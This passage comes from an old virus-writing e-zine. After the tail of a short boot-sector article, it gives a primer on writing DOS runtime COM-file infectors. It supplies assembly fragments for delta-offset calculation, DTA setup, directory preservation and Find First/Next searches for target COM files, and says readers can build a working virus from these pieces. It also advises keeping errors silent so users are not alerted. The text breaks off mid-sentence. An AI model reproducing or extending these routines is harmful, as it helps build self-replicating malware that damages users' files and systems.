The actual program is very simple. It just sets up a stack and the
segment registers, and then prints that it will do nothing. Gee, what a
life...

After the message we wait for a key and next signal:

  - fast reboot
  - jump to the reboot vector

Whatever there will be between end of code and offset 01FE is not
relevant (it could be your ad) but the last two bytes of the boot sector
must be a valid boot signature.

That's it. With this code you can make your own custom non-bootsector.

I hope this software has also shown that linking and assuming are
supported by A86, but certainly not necessary. Also, this software does
not rely on any HLL calls. It's just assembly language as it should be.

I want to remark that this software is Open Source, according to the rules
of the GNU GPL. Make sure you understand these rules before embedding this
routine in your own software.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    A Basic Virus Writing Primer
                                                    by Chili


What horror  must the ignorant victim  undergo as it  becomes aware  of a being
that lives inside its own body, growing ever stronger, reproducing itself until
its host, unable to bear more finally colapses and dies an horrible death. What
panic  it must  feel,  knowing nothing  can be  done  in time  to avoid  such a
terrible fate.  A predator so tiny, that unsuspectedly it spreads from one host
to  another,  by  so  rapidly  infecting  millions.  An  organism,  so  utterly
resourceful and small, that it stays most of the time undetectable, breeding in
the shadows.

Computer viruses aren't much  different from their biological counterpart,  but
instead of infecting cells they infect files and boot sectors.  In this article
I'll try to explain the basics of file viruses,  more specifically runtime (aka
direct  action)  COM  infectors.   This  will  cover  most  simple  search  and
replication  methods used and  is only to be  considered as an  introduction to
virus writing.  After some thought I've decided not  to include any full source
code  for a  working virus,  since anyone  with  half  a brain  and a  somewhat
mediocre  knowledge of assembly can  easily build a virus out  of the pieces of
code  that will  be presented.  Furthermore  it's not  my wish to  increase the
number of viruses in the wild, thing that would undoubtedly happen by the hands
of some I-have-no-brain-and-can't-program-hellspawn bent on random destruction.
Anyway, on with the article...


Some Sort Of 'Programming Virii Safely' Guide
---------------------------------------------
The only really safe way  to program viruses  is to know what you're  doing and
understand at  every time how the virus is behaving.  If you test a virus on
your
own machine without fully comprehending its ins and outs, then you will most
likely have your system trashed. It would be best if you had a second computer
just for this purpose, since a buggy programming can lead to a lot of crashes
and general havoc.  If not, a Ramdrive can be created and a Subst can be done,
so that all accesses to  physical drives are  redirected to the virtual one.
Assuming that you want your Ramdrive to have 512-byte sectors, a limit of 1024
entries and to allocate 2048K of extended memory,  you must add this line to
your
CONFIG.SYS:

DEVICE=C:\DOS\RAMDRIVE.SYS 2048 512 1024 /E

Then you must copy COMMAND.COM  and SUBST.EXE to the Ramdrive so that DOS won't
hang and also in order for you to be able to delete all redirections when done.
And to associate all  physical drives to the newly  created virtual drive  (and
assuming that it is D: and all your drives are A: and C:) you should do:

SUBST A: D:\
SUBST C: D:\

Of course this last method isn't  perfect. You should always know how to
completely remove a virus before running it, or you'll end cleaning up the mess
for quite some time.

Just use  common sense.  For example,  if  you're  writing a  virus aimed  at a
specific file type,  all you have  to do is copy all files of that  type you do
not wish to  be infected to a different extension and when  you're done testing
just  switch those files  back to their original extension.  While testing  you
should  also place breakpoints  and warning  messages throughout  the code,  so
that you know at all times what  the virus is doing as well as it will help you
debugging it. Also you should program and test different routines separately as
it will reduce complexity and bug proneness.  Lastly the use of memory and disk
mapping/editing utilities,  a set of good anti-virus and most important the use
of backups is encouraged, so that you can keep track  of things and are able to
restore your system in case something goes wrong.

In case things  get really out of hand  you should always  have a clean "rescue
disk" which you should  create by doing a FORMAT A: /S /U and then copying into
it some  useful DOS files  like FORMAT.COM,  UNFORMAT.COM, FDISK.EXE,  SYS.COM,
MEM.EXE,  ATTRIB.EXE, DEBUG.EXE,  CHKDSK.EXE, SUBST.EXE,  a text editor just in
case and whichever other  files you may find useful.  Also an anti-virus should
be included along.  Don't forget to write protect the disk and put it in a safe
place.  The first thing  you should  do in order to clean  up your system is to
boot from  your  previously  created disk  and  use your  anti-virus clean  and
restoration features, as most times this will work, saving you a lot of hassle.
In last resort,  you should run FDISK /MBR to re-write the  executable code and
error messages of the partition sector,  then run FDISK and first delete,  then
create a new partion table and finally run FORMAT C: /S /U.  Your system should
now be  completely clean and you can restore your backups at this time.  If all
you want is to clean a floppy disk instead of a hard disk, then all you have to
do is run FORMAT A: /S /U to create a new boot sector,  FAT and root directory.
Of course that after this procedures all data will be lost, so as I said before
this should only be used if you're really desperate.

Above all, don't forget to backup, backup, backup!


Tools & References
------------------
In order to write and test a sucessful virus  you need some useful programs and
references, such as:

- An assembler (TASM, MASM, Intel's ASM86, A86, NASM, ...) -  I recommend using
   Turbo Assembler, as all code I will provide will be tested with it.
- A linker (TLINK, LINK, Intel's LINK86...) - Again I recommend Turbo Linker.
- A debugger (Dos' DEBUG, TD, ...) - Dos' DEBUG is old but will do the job, you
   can use Turbo Debugger though, as it is somewhat better.
- A text and a hex editor of your choice.
- A disassembler (DEBUG, Sourcer, IDA, ...) - You can use Dos' DEBUG, but would
   be better  if you used Sourcer which is very  good or IDA which  is excellent
   but very large in size.
- Some other things like TSR Utilities by TurboPower Software, Norton Utilities
   and more.
- A good set of Anti-Virus packages, such as ThunderBYTE Anti-Virus (as a great
   set of utilities  to backup your bootsector,  partition table and CMOS),  AVP
   (AntiViral Toolkit Pro) and F-PROT.  Also available are  McAfee (now  Network
   Associates, I think) VirusScan, Dr.Solomon's AVTK and Norton Anti-Virus.
- Ralph Brown's  x86/MSDOS Interrupt  List,  Norton Guides'  Assembly  Language
   database, David Jurgens' HelpPC, DOSREF (Programmers' Technical Reference for
   MSDOS and the IBM PC) and others you find useful.


On Viruses
----------
There are two things that must always be present on every working virus,  first
the search routine that seeks for  suitable targets for the virus to infect and
lastly the replication routine that copies the virus to the found target. Other
routines may also be added in order to enhance the virus and the two more basic
and  essencial parts  can be improved,  increasing its performance,  albeit its
complexity too.

I intentionally left out a major routine, the payload (aka activation routine),
though not necessary, it is present in almost all viruses.  Sincerely I see  no
real use for  most activation routines,  since all they do is seriously cripple
the virus's chance to spread. Besides, all good payloads must be custom made (as
should all viruses,  but that's another story...), so you'll have to build your
own if  you want one.  For some old  good examples of  non-destructive payloads
take a look at Ambulance Car, Cascade, Den Zuk, Corporate Life and Crucifixion.

All code presented hereafter was first tested on both of my machines and works,
but this  doesn't mean that it will work on  all possible configurations,  so I
can't fully guarantee that it won't ever cause unwanted damage. It's bad enough
that  your virus  may unwillingly  trash someone's  data,  so don't go  writing
destructive payloads just for the hell of it. Programming - and therefore virus
writing - is an art, treat it as such.


A Word On Error Trapping
------------------------
Error trapping is regrettably one of the most forgotten things in viruses.  You
should always  account for errors in order not to  crash and even trash things.
This doesn't mean that you should present cute DOS-like error messages, as this
would  alert the  user,  instead you  should  process  the information  and act
accordingly. That most times just means that you should abort the virus ongoing
operations and restore control back to the host.


Optimization
------------
All code will be presented in an unoptimized form for ease of understanding and
also because all routines are shown  seperate from each other so  that they are
portable to  different kinds of viruses.  When writing a full virus  you should
always optimize your code, so that it takes as little space as possible.  Don't
use procedures unless you can save space by doing so.  Also don't use variables
when you can use registers (for example the F_Handle variable needs not be used
since you could just use the stack or some free register - see below).


Delta Offset
------------
When you're programming a virus that will always be placed at a fixed location,
like overwriting  and prepending viruses,  you won't have to worry about any of
this, but if you're writing a virus that relocates part of its code to a random
location,  such as appending and midfile infectors,  you'll have to account for
the  displacement.  This doesn't affect most  jumps and calls,  since they  are
relative,  but data on the other hand is refered by an absolute offset.  Things
would work fine the first  time you assembled and run the virus,  but not after
the first infection when all memory addresses would then be changed.

To account for this all one has to do is:

--8<---------------------------------------------------------------------------
Delta_Offset:
         call    Find_Displacement
Find_Displacement:
         pop     bp
         sub     bp, offset Find_Displacement
---------------------------------------------------------------------------8<--

What this piece of code does is, first issue a CALL to the next instruction, so
the IP (Instruction Pointer) for it will pushed into the stack,  next we POP it
to the  register BP  (it is good programming  to use BP,  which stands for Base
Pointer), and finally we SUBtract the original OFFSET determined when the virus
was compiled.  Of course the first time the virus is run, the displacement will
be zero, only on subsequent runs will it change according to the host size.

I'll be presenting code for infectors that require delta offset calculation, so
for all the other infectors that don't, in order to accommodate any of the code
presented hereafter you'll just have to strip out any displacement calculations
as in the following examples:

Replace
         lea     dx, [bp+offset DTA]
With
         lea     dx, DTA

Replace
         mov     word ptr [bp+F_Handle], ax
With
         mov     F_Handle, ax

Once you've given it a little thought and figured it out it's not as hard as it
may  first seem.  Of course that  even if you're  programming a  fixed location
virus you  can still leave all code as if you were writing one that  needed you
to  calculate  the  delta  offset,  since  the  displacement  is  always  zero.
Nevertheless you shouldn't do this,  mainly because it adds unnecessary size to
the virus and it is extremely sloppy (and lazy) programming (copying?!?!).


.COM File Structure
-------------------
COM files are raw binary executables,  designed for compatibility  with the old
CP/M operating system.  Whenever a COM file is executed, DOS first sets aside a
segment (64K) of memory for it,  then builds a PSP  (Program Segment Prefix) in
the first  256 bytes,  after which the  program is loaded into.  Before passing
control to the program DOS does some things first, among which are:

    1) Register AX  reflects the validity  of drive specifiers  entered with the
       first two parameters as follows:
         AL=0FFh if the  first parameter  contained an invalid drive  specifier,
                 otherwise AL=00h
         AL=0FFh if the second  parameter contained an invalid  drive specifier,
                 otherwise AL=00h

    2) All four segment registers contain the segment address of the PSP control
       block

    3) The Instruction Pointer (IP) is set to 100h

    4) The SP register is set to the  end of the program's segment and a word of
       zeroes is placed on top of the stack

In case  any of  this  things  are  changed  during  the virus  execution,  you
shouldn't forget to restore them before passing control back to the host.

So, given this, a COM file program can only have a maximum size of 65277 bytes,
since you have to account for the PSP and  at least for the two  bytes occupied
by the stack.  Here is how a COM file looks when loaded in memory:

    FFFFh +--------------------+ <- SP
          |                    |
          |       Stack        |
          |                    |
          +--------------------+
          |                    |
          | Uninitialized Data |
          |                    |
          +--------------------+
          |                    |
          |   COM File Image   |
          |                    |
     100h +--------------------+ <- IP
          |                    |
          |        PSP         |
          |                    |
       0h +--------------------+ <- CS, DS, ES, SS

Don't forget to account for  stack growth needed by your program as well as any
uninitalized data, for if you don't there is a chance that it will crash, since
the stack  may grow large  enough to overwrite  data or code,  or your data may
wrap around and overwrite the PSP and the code.


Program Segment Prefix (PSP)
----------------------------
A PSP is created  by DOS for all programs and contains  most of the information
one needs to know about them. Its structure looks like this:

    [ PSP - Program Segment Prefix ]

    Offset       Size            Description
    ------       ----            -----------
    0h           Word            INT 20h instruction
    2h           Word            Segment address of top of the current program's
                                 allocated memory
    4h           Byte            Reserved
    5h           Byte            Far call to DOS function dispatcher (INT 21h)
    6h           Word            Available bytes in the segment for .COM files
    8h           Word            Reserved
    Ah           Dword           INT 22h termination address
    Eh           Dword           INT 23h Ctrl-Break handler address
    12h          Dword           DOS 1.1+ INT 24h critical error handler address
    16h          Byte            Segment of parent PSP
    18h       20 Bytes           DOS 2+ Job File Table (one byte per file handle
                                 FFh = available/closed)
    2Ch          Word            DOS 2+ segment address of  process' environment
                                 block
    2Eh          Dword           DOS 2+ process' SS:SP  on entry to last INT 21h
                                 function call
    32h          Word            DOS 3+ number of entries in JFT
    34h          Dword           DOS 3+ pointer to JFT
    38h          Dword           DOS 3+ pointer to previous PSP
    3Ch       20 Bytes           Reserved
    50h        3 Bytes           DOS 2+ INT 21h/RETF instructions
    53h        9 Bytes           Unused
    5Ch       16 Bytes           Default unopened File Control Block 1 (FCB1)
    6Ch       16 Bytes           Default unopened File Control Block 2 (FCB2)
    7Ch        4 Bytes           Unused
    80h          Byte            Command line length in bytes
    81h      127 Bytes           Command line (ends with a Carriage Return 0Dh)

Note:  For a more  detailed explanation  of the  PSP structure,  including many
undocumented features, see Ralph Brown's x86/MSDOS Interrupt List.

And here are the default file handles for the Job File Table (JFT):

    [ DOS Default/Predefined File Handles]

    0 - Standard Input Device, can be redirected (STDIN)
    1 - Standard Output Device, can be redirected (STDOUT)
    2 - Standard Error Device, can be redirected (STDERR)
    3 - Standard Auxiliary Device (STDAUX)
    4 - Standard Printer Device (STDPRN)

The  File Control Block  (FCB)  and the  Environment Block  structures will  be
covered on a later article, as they aren't needed for now.


Disk Transfer Area (DTA)
------------------------
For all  file reads and writes  performed using FCB function calls,  as well as
for "Find First"  and "Find Next" calls  using FCBs or not,  DOS uses a  memory
buffer called Disk Transfer Area,  which is by default located at offset 80h in
the PSP and is 128 bytes long (this area is also used by the command tail),  so
in order  not to interfere with  whichever command line parameters  there might
be,  the Disk Transfer Address should be set to a different location in memory.
This is done like this:

--8<---------------------------------------------------------------------------
Set_DTA:
         mov     ah, 1Ah
         lea     dx, [bp+offset DTA]
         int     21h
---------------------------------------------------------------------------8<--

;Interrupt:     21h
;Function:      1Ah     - Set Disk Transfer Address (DTA)
;On entry:      AH      - 1Ah
;               DS:DX   - Address of DTA
;Returns:       Nothing

Of course  that before passing control  back to the host you should restore the
Disk Transfer Address back to its original value:

--8<---------------------------------------------------------------------------
Restore_DTA:
         mov     ah, 1Ah
         mov     dx, 80h
         int     21h
---------------------------------------------------------------------------8<--

A sufficient  buffer area  should always  be reserved,  as DOS will  detect and
abort any disk transfers that would  fall off the end of the current segment or
wrap around within the segment.


FindFirst Data Block
--------------------
Upon a  successful "Find First Matching File"  function call the  Disk Transfer
Area is filled with a  FindFirst Data Block which contains info on the matching
file found, also after a  "Find Next Matching File" function call  that data is
updated. As we'll only be using the DTA for this, all we need to when setting a
new one is to have a 43 bytes long buffer so that we can allocate the FindFirst
Data Block:

--8<---------------------------------------------------------------------------
DTA:
    Reserv       db      21      dup     (?)
    F_Attr       db      (?)
    F_Time       dw      (?)
    F_Date       dw      (?)
    F_Size       dd      (?)
    F_Name       db      13      dup     (?)
---------------------------------------------------------------------------8<--

And here is the FindFirst Data Block structure:

    [ FindFirst Data Block ]

    Offset       Size            Description
    ------       ----            -----------
    0h        21 Bytes           Reserved  for DOS  use on subsequent  Find Next
                                 calls - is different per DOS version
    15h          Byte            Attribute of matching file
    16h          Word            File time stamp
    18h          Word            File date stamp
    1Ah          Dword           File size in bytes
    1Eh       13 Bytes           ASCIIZ filename and extension

The file attribute field looks like this:

    [File Attribute]

    Bit(s)                       Description
    ------                       -----------
    7 6 5 4 3 2 1 0
    . . . . . . . 1              Read-only
    . . . . . . 1 .              Hidden
    . . . . . 1 . .              System
    . . . . 1 . . .              Volume label
    . . . 1 . . . .              Directory
    . . 1 . . . . .              Archive
    x x . . . . . .              Unused

The file time field is like this:

    [File Time]

    Bit(s)                               Description
    ------                               -----------
    F E D C B A 9 8 7 6 5 4 3 2 1 0
    . . . . . . . . . . . x x x x x      Seconds/2 (0..29) - 2 second increments
    . . . . . x x x x x x . . . . .      Minutes (0..59)
    x x x x x . . . . . . . . . . .      Hours (0..23)

And finally the file date field like this:

    [File Date]

    Bit(s)                               Description
    ------                               -----------
    F E D C B A 9 8 7 6 5 4 3 2 1 0
    . . . . . . . . . . . x x x x x      Day (1..31)
    . . . . . . . x x x x . . . . .      Month (1..12)
    x x x x x x x . . . . . . . . .      Year since 1980 (0..119)


Current Directory Preservation
------------------------------
If you're searching  for files outside the  directory where your virus  was run
from, you must save the old directory and restore it when you're done. First to
save it you must do:

--8<---------------------------------------------------------------------------
Get_Directory:
         mov     ah, 47h
         mov     dl, 0
         lea     si, [bp+offset Orig_Dir]
         int     21h
         jnc     Find_First
         jmp     Return_Control
---------------------------------------------------------------------------8<--

;Interrupt:     21h
;Function:      47h     - Get Current Directory
;On entry:      AH      - 47h
;               DL      - Drive number (0=default, 1=A, etc.)
;               DS:SI   - Pointer to a 64-byte buffer
;Returns:       AX      - Error code, if CF is set
;Error codes:   15      - Invalid drive specified
;Notes: This  function returns  the full  pathname  of the  current  directory,
;       excluding  the drive designator and initial backslash character,  as an
;       ASCIIZ string at the memory buffer pointed to by DS:SI.

A 64 byte long buffer must be present to hold the original directory:

--8<---------------------------------------------------------------------------
Orig_Dir        db      64    dup     (?)
---------------------------------------------------------------------------8<--

Then before actually restoring to the old directory, you must first change to
the root directory and then restore from there, since all paths are relative to
it.

--8<---------------------------------------------------------------------------
ChangeTo_Root:
         mov     ah, 3Bh
         lea     dx, [bp+offset Root]
         int     21h
         jc      Restore_DTA
---------------------------------------------------------------------------8<--

;Interrupt:     21h
;Function:      3Bh     - Change Directory (CHDIR)
;On entry:      AH      - 3Bh
;               DS:DX   - Pointer  to name of  new  default  directory  (ASCIIZ
;                         string)
;Returns:       AX      - Error code, if CF is set
;Error Codes:   3       - Path not found
;Notes: This function changes the current directory to the directory whose path
;       is specified in the  ASCIIZ string at address DS:DX;  the string length
;       is limited to 64 characters.  The path name may include a drive letter.

A buffer containing a ASCIIZ string representing the root:

--8<---------------------------------------------------------------------------
Root            db      '\', 0
---------------------------------------------------------------------------8<--

And finally you switch to the original directory  (if the original directory is
the root there  will be an error since  the path won't be valid -  this doesn't
matter since we changed to root before):

--8<---------------------------------------------------------------------------
Restore_Directory:
         mov     ah, 3Bh
         lea     dx, [bp+offset Orig_Dir]
         int     21h
         ;jc      Restore_DTA            ;No need, since it's right after
---------------------------------------------------------------------------8<--

If you change drives while searching for files to infect  (this will be covered
in a next article) you should also preserve the original drive and then restore
it in the end.


File Search Techniques
----------------------
A runtime  virus  can  infect  files  located  in  the  current  directory,  in
subdirectories,  maybe only in root,  in the PATH and even on different drives.
You must  be very careful when writing  your search routine,  since if you only
infect files  in a few places your  virus won't spread much,  but if you search
for files to infect in every possible place, after the first infections it will
start to take much  longer to find new hosts  (since most are already infected)
and  disk activity might  last for long  enough to be  noticeable. Some of this
techniques are presented below. The others will be presented on a next article.


Find First/Find Next
--------------------
This is used when you want to search for files on a the current directory.  You
start by searching for the first matching COM file with normal attributes:

--8<---------------------------------------------------------------------------
Find_First:
         mov     ah, 4Eh
         mov     cx, 0
         lea     dx, [bp+offset COM_Mask]
         int     21h
         jnc     Open_File
         jmp     Return_Control
---------------------------------------------------------------------------8<--

;Interrupt:     21h
;Function:      4Eh     - Find First Matching File (FIND FIRST)
;On entry:      AH      - 4Eh
;               CX      - File attribute
;               DS:DX   - Pointer to filespec (ASCIIZ string)
;Returns:       AX      - Error code, if CF is set
;Error codes:   2       - File not found
;               3       - Path not found
;               18      - No more files to be found
;Notes: If CX  is 0,  the function  searches  for  normal  files  only.  If  C